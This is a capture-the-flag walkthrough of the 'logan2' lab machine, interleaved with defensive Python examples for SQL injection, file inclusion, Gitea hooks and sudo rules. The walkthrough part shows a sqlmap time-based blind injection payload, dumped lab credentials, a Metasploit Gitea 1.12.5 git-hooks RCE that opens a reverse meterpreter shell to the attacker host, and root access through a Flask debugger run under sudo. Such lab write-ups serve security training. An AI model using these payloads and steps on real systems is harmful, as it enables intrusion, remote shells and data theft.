Difficulty: Medium
Kali: 192.168.56.104
Target: 192.168.56.146
Port scan
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 19:41 CST
Nmap scan report for 192.168.56.146
Host is up (0.000067s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:43:A6:79 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Three ports are open: 22, 80 and 3000.
Start with a directory scan.
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.146 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,zip,html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.zip (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.zip (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.zip (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/config.php (Status: 200) [Size: 0]
/index.html (Status: 200) [Size: 148]
/index.html (Status: 200) [Size: 148]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.146/javascript/]
/server-status (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================
Take a look at the web service.
The page source references script.js.
It sends a POST with a user_agent parameter.
Testing shows the parameter is vulnerable to SQL injection.
Save the request to a file and run it through sqlmap.
Enumerate databases
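As an added illustration of the bug class behind save-user-agent.php (this is example code written for this page, not the target's source, which was never read), the snippet below splices the JSON value into SQL the way the vulnerable endpoint evidently does, then shows the parameterized form beside it. It uses an in-memory SQLite database and constructed rows in place of the target's MariaDB; the probe value is the one from the captured request above. With the vulnerable INSERT the stored value is the evaluated expression rather than the submitted string, and with the vulnerable SELECT the same input matches every row; the bound-parameter versions treat it as plain text.

```python
import sqlite3

# Constructed sample rows; the column names mirror the logan.users table sqlmap dumped.
SAMPLE_USERS = [
    ("alice", "alice@example.test"),
    ("bob", "bob@example.test"),
    ("carol", "carol@example.test"),
]

# The probe value from the page's captured request.
PAGE_PAYLOAD = "1' or '1'='1"


def make_db():
    """In-memory SQLite database standing in for the target's MariaDB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, email TEXT)")
    conn.execute("CREATE TABLE browser (user_agent TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def save_user_agent_vulnerable(conn, user_agent):
    """Bug class of save-user-agent.php: the JSON field is spliced into the SQL text.
    Returns what actually landed in the table."""
    cur = conn.execute("INSERT INTO browser (user_agent) VALUES ('" + user_agent + "')")
    row = conn.execute("SELECT user_agent FROM browser WHERE rowid = ?", (cur.lastrowid,)).fetchone()
    return row[0]


def save_user_agent_safe(conn, user_agent):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    cur = conn.execute("INSERT INTO browser (user_agent) VALUES (?)", (user_agent,))
    row = conn.execute("SELECT user_agent FROM browser WHERE rowid = ?", (cur.lastrowid,)).fetchone()
    return row[0]


def lookup_vulnerable(conn, user):
    """Same defect in a SELECT: the WHERE clause is built by string concatenation."""
    sql = "SELECT user, email FROM users WHERE user = '" + user + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user):
    """Bound parameter: the input can only ever be compared as a value."""
    return conn.execute("SELECT user, email FROM users WHERE user = ?", (user,)).fetchall()


def demo():
    """Run both variants against the page's probe value and report what happened."""
    conn = make_db()
    return {
        # '1' or '1'='1' is evaluated by the engine and stored as 1
        "stored_vulnerable": save_user_agent_vulnerable(conn, PAGE_PAYLOAD),
        # the literal string is stored unchanged
        "stored_safe": save_user_agent_safe(conn, PAGE_PAYLOAD),
        # the tautology matches every user row
        "rows_vulnerable": len(lookup_vulnerable(conn, PAGE_PAYLOAD)),
        # no user is literally named "1' or '1'='1"
        "rows_safe": len(lookup_safe(conn, PAGE_PAYLOAD)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The endpoint on the box returns nothing useful in its response, which is why sqlmap fell back to a time-based blind technique; SQLite has no SLEEP(), so that part is not reproduced here, but the root cause and the fix are the same.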
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.8.2#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:57:23 /2024-04-04/
[19:57:23] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[19:57:23] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:57:23] [INFO] resuming back-end DBMS 'mysql'
[19:57:23] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0757pm.csv' as the CSV results file in multiple targets mode
[19:57:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[19:57:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:57:23] [INFO] fetching database names
[19:57:23] [INFO] fetching number of databases
[19:57:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[19:57:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[19:57:33] [INFO] retrieved:
[19:57:38] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[19:58:35] [INFO] retrieved: logan
available databases [2]:
[*] information_schema
[*] logan
[19:58:52] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0757pm.csv'
[*] ending @ 19:58:52 /2024-04-04/
Enumerate tables
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch -D logan -tables
___
__H__
___ ___[,]_____ ___ ___ {1.8.2#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:59:48 /2024-04-04/
[19:59:48] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[19:59:48] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:59:48] [INFO] resuming back-end DBMS 'mysql'
[19:59:48] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0759pm.csv' as the CSV results file in multiple targets mode
[19:59:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[19:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:59:48] [INFO] fetching tables for database: 'logan'
[19:59:48] [INFO] fetching number of tables for database 'logan'
[19:59:48] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[19:59:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[20:00:03] [INFO] adjusting time delay to 1 second due to good response times
3
[20:00:03] [INFO] retrieved: browser
[20:00:25] [INFO] retrieved: comments
[20:00:52] [INFO] retrieved: users
Database: logan
[3 tables]
+----------+
| browser |
| comments |
| users |
+----------+
[20:01:07] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0759pm.csv'
[*] ending @ 20:01:07 /2024-04-04/
Dump data
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch -D logan -T users --dump
___
__H__
___ ___[.]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:01:43 /2024-04-04/
[20:01:43] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[20:01:43] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[20:01:43] [INFO] resuming back-end DBMS 'mysql'
[20:01:43] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0801pm.csv' as the CSV results file in multiple targets mode
[20:01:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[20:01:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:01:43] [INFO] fetching columns for table 'users' in database 'logan'
[20:01:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:01:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[20:01:53] [INFO] retrieved:
[20:01:58] [INFO] adjusting time delay to 1 second due to good response times
user
[20:02:09] [INFO] retrieved: email
[20:02:22] [INFO] fetching entries for table 'users' in database 'logan'
[20:02:22] [INFO] fetching number of entries for table 'users' in database 'logan'
[20:02:22] [INFO] retrieved: 1
[20:02:23] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
logan
[20:02:41] [INFO] retrieved: logan@newsitelogan.logan.hmv
Database: logan
Table: users
[1 entry]
+------------------------------+--------+
| email | user |
+------------------------------+--------+
| logan@newsitelogan.logan.hmv | logan |
+------------------------------+--------+
[20:04:19] [INFO] table 'logan.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.146/dump/logan/users.csv'
[20:04:19] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0801pm.csv'
[*] ending @ 20:04:19 /2024-04-04/
There is a subdomain; add it to /etc/hosts first.
The source suggests a file inclusion.
Testing confirms directory traversal works.
The Apache log can be included, which should give RCE, but my RCE attempts never worked.
Running phpinfo showed that the command-execution functions are all disabled.
So file inclusion is the only option; the directory scan found a config.php that may contain something.
Read it through the include.
logan:Super_logan1234
SSH login fails.
Move on to port 3000.
Another Gitea instance.
Log in.
This time it is an old version, 1.12.5, which should be vulnerable.
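For contrast with the include bug used above, here is the check a page-inclusion handler should have done. This is added example code, not from the target or the page; the web root, page names and the rejected inputs are constructed, and nothing needs to exist on disk because realpath only normalizes. The resolver refuses NUL bytes and stream wrappers, collapses traversal with realpath, and keeps only paths whose common prefix with the web root is the web root itself (a plain startswith would accept a sibling directory such as /var/www/htmlx). The stricter variant maps a short name to a fixed file, which is the form most include-by-parameter pages should take.

```python
import os

# Constructed web root for the example.
WEB_ROOT = "/var/www/html"

# Allowlist of pages the application is meant to include, keyed by the request value.
PAGES = {
    "home": "pages/home.php",
    "about": "pages/about.php",
}


def resolve_include(base_dir, requested):
    """Return the absolute file path if `requested` stays under base_dir, else None."""
    if not requested or "\0" in requested or "://" in requested:
        # NUL bytes and stream wrappers (php://, http://, ...) are never valid page names
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when `requested` is absolute; realpath collapses ../
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath, not startswith: /var/www/htmlx must not pass for base /var/www/html
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.endswith(".php"):
        # log files, /etc/passwd and the like never carry the page extension
        return None
    return candidate


def include_by_name(name):
    """Stricter: map a short name to a fixed file; anything not in PAGES is refused."""
    rel = PAGES.get(name)
    return resolve_include(WEB_ROOT, rel) if rel else None


if __name__ == "__main__":
    for probe in ("pages/home.php", "../../../../var/log/apache2/access.log",
                  "/etc/passwd", "http://example.test/page.php"):
        print(f"{probe!r:50} -> {resolve_include(WEB_ROOT, probe)}")
    print("include_by_name('about') ->", include_by_name("about"))
    print("include_by_name('../config') ->", include_by_name("../config"))
```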
┌──(root㉿kali2)-[~/Desktop]
└─# searchsploit gitea 1.12
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authenticated) | multiple/webapps/49571.py
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Perfect!
I'll use msf for the RCE.
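On the defensive side, the setting that decides whether this module has anything to work with is `DISABLE_GIT_HOOKS` in the `[security]` section of Gitea's app.ini: while hooks are enabled, a user who is allowed to edit repository git hooks can run commands as the Gitea service account, which is exactly the `git` uid the session below lands in. Gitea 1.13 changed the default of that key to true, so on a 1.12.x install like this one an absent key means hooks are enabled. The audit below is added example code (not Gitea's own tooling); the two app.ini fragments are constructed.

```python
import configparser

# Constructed app.ini fragment standing in for a 1.12.x install that never set the key.
SAMPLE_APP_INI = """
[server]
HTTP_PORT = 3000

[security]
INSTALL_LOCK = true
IMPORT_LOCAL_PATHS = false
"""

# Constructed hardened fragment: hooks switched off explicitly.
HARDENED_APP_INI = """
[security]
INSTALL_LOCK = true
IMPORT_LOCAL_PATHS = false
DISABLE_GIT_HOOKS = true
"""


def audit_gitea_ini(ini_text, version):
    """Return findings for settings that let an authenticated user run code on the host."""
    cp = configparser.ConfigParser(interpolation=None)  # app.ini values may contain '%'
    cp.read_string(ini_text)
    major, minor = (int(part) for part in version.split(".")[:2])
    # Before 1.13 DISABLE_GIT_HOOKS defaulted to false, so a missing key means hooks are on.
    default_hooks_disabled = (major, minor) >= (1, 13)
    findings = []
    hooks_disabled = cp.getboolean("security", "DISABLE_GIT_HOOKS",
                                   fallback=default_hooks_disabled)
    if not hooks_disabled:
        findings.append("git hooks enabled: users allowed to edit hooks can run "
                        "commands as the gitea service user")
    if cp.getboolean("security", "IMPORT_LOCAL_PATHS", fallback=False):
        findings.append("IMPORT_LOCAL_PATHS enabled: repository import can read "
                        "local filesystem paths")
    return findings


if __name__ == "__main__":
    for label, ini in (("sample", SAMPLE_APP_INI), ("hardened", HARDENED_APP_INI)):
        print(label, "1.12.5:", audit_gitea_ini(ini, "1.12.5") or "no findings")
```

Upgrading past 1.12.5 removes the specific bug the module exploits, but leaving hooks enabled still hands shell access to anyone granted the hook permission, so the key is worth setting regardless of version.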
msf6 > search gitea 1.12.5
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/gitea_git_hooks_rce 2020-10-07 excellent Yes Gitea Git Hooks Remote Code Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gitea_git_hooks_rce
msf6 > use 0
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > options
Module options (exploit/multi/http/gitea_git_hooks_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasplo
it/basics/using-metasploit.html
RPORT 3000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes Username to authenticate with
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address
on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Dropper
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD Super_logan1234
PASSWORD => Super_logan1234
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhosts 192.168.56.146
rhosts => 192.168.56.146
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME logan
USERNAME => logan
msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 192.168.56.104
LHOST => 192.168.56.104
msf6 exploit(multi/http/gitea_git_hooks_rce) > run
[*] Started reverse TCP handler on 192.168.56.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "logan/Super_logan1234"
[+] Logged in
[*] Create repository "Quo_Lux_Asoka"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3045380 bytes) to 192.168.56.146
[*] Meterpreter session 1 opened (192.168.56.104:4444 -> 192.168.56.146:40686) at 2024-04-04 20:59:07 +0800
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Quo_Lux_Asoka deleted.
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 1736 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
id
uid=104(git) gid=113(git) groups=113(git)
Out of habit, I pop a shell back to Kali.
sudo -l
git@logan2:~$ sudo -l
sudo -l
Matching Defaults entries for git on logan2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User git may run the following commands on logan2:
(ALL) NOPASSWD: /usr/bin/python3 /opt/app.py
git@logan2:~$ cat /opt/app.py
cat /opt/app.py
cat: /opt/app.py: Permission denied
Not readable, so just run it and see what it does.
git@logan2:~$ sudo /usr/bin/python3 /opt/app.py
sudo /usr/bin/python3 /opt/app.py
* Serving Flask app 'app'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:8000
* Running on http://127.0.0.1:8000
Press CTRL+C to quit
* Restarting with stat
* Debugger is active!
* Debugger PIN: 671-200-552
A service is listening on port 8000, and it printed the debugger PIN.
Open the console.
system() is unavailable, so use popen; it turns out I am already root, so both the user flag and the root flag can be submitted.
If you are not comfortable with the console, you can pop a shell instead; it makes no difference.
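The root cause here is a sudo rule that runs an interpreter as root on a script that starts the Flask development server with the debugger on; the Werkzeug console then executes Python as the process owner. The audit below is added example code, not anything from the box: it parses the `sudo -l` output shown above, flags NOPASSWD rules whose command is an interpreter, and statically inspects the script the rule points at for `app.run(debug=True)` and an all-interfaces bind. The page could not read the real /opt/app.py, so the script source used here is a constructed stand-in that matches only what the console output implies.

```python
import ast
import os
import re
import shlex

# sudo -l output as shown on the page (raw string so the \: in secure_path stays literal).
SUDO_L_OUTPUT = r"""
Matching Defaults entries for git on logan2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User git may run the following commands on logan2:
    (ALL) NOPASSWD: /usr/bin/python3 /opt/app.py
"""

# Constructed stand-in for /opt/app.py; the real file was unreadable.
SAMPLE_APP_PY = """
from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
    return "ok"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000, debug=True)
"""

# Constructed hardened variant: debugger off, loopback only.
HARDENED_APP_PY = SAMPLE_APP_PY.replace('host="0.0.0.0"', 'host="127.0.0.1"') \
                               .replace("debug=True", "debug=False")

INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "sh", "bash", "node"}

# "(runas) TAG: command" lines from sudo -l; Defaults lines do not start with "("
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(text):
    """Extract (runas, tags, command) from sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"], "tags": m["tags"].strip(),
                          "cmd": m["cmd"].strip()})
    return rules


def flask_run_calls(source):
    """Return (host, debug_enabled) for every `.run(...)` call in the script."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute) \
                and node.func.attr == "run":
            kw = {k.arg: k.value for k in node.keywords}
            debug = kw.get("debug")
            host = kw.get("host")
            debug_on = isinstance(debug, ast.Constant) and debug.value is True
            host_val = host.value if isinstance(host, ast.Constant) else None
            hits.append((host_val, debug_on))
    return hits


def audit(sudo_text, scripts):
    """scripts maps a path named in a rule to its source; returns a list of findings."""
    findings = []
    for rule in parse_sudo_rules(sudo_text):
        argv = shlex.split(rule["cmd"])
        prog = os.path.basename(argv[0])
        if prog not in INTERPRETERS:
            continue
        findings.append(f"{rule['cmd']}: {prog} runs as {rule['runas']} "
                        f"({rule['tags'] or 'password required'})")
        for arg in argv[1:]:
            src = scripts.get(arg)
            if src is None:
                continue
            for host, debug_on in flask_run_calls(src):
                if debug_on:
                    findings.append(f"{arg}: Flask debugger enabled, its console "
                                    f"executes Python as {rule['runas']}")
                if host == "0.0.0.0":
                    findings.append(f"{arg}: development server bound to all interfaces")
    return findings


if __name__ == "__main__":
    for label, src in (("as on the box", SAMPLE_APP_PY), ("hardened", HARDENED_APP_PY)):
        print(label)
        for finding in audit(SUDO_L_OUTPUT, {"/opt/app.py": src}):
            print("  -", finding)
```

The hardened variant still produces one finding, because a root-level sudo rule on an interpreter deserves review even when the script it runs is benign: whoever can change /opt/app.py, or whatever it imports, gets the same result.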